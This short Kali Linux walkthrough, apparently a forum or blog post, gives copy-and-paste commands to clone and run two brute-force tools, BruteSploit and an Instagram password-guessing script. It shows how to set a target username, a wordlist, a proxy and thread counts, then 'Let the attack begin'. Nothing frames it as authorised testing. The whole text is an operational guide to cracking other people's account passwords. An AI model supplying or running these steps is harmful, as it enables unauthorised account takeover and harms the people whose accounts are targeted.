For Kali Linux
We open the terminal
(Copy and paste one by one line)
git clone https://github.com/Screetsec/BruteSploit.git
cd BruteSploit
chmod +x Brutesploit
./Brutesploit
help : Indicates the meaning of commands.
show modules
list 0e4
use 0e4
show options : We are learning the required ones
set username target
set wordlist WordList Road
set proxy Proxy Road
set thread 4
show options : We check it out.
run : Let the attack begin
ANOTHER METHOD
we open the terminal
you need wordlist about target to use the tool
git clone https://github.com/Pure-L0G1C/Instagram.git
cd Instagram-master
ls
pip3 install -r requirements.txt
python3 instagram.py target user name /root/Desktop/wordlist.txt -m 0 : wordlist path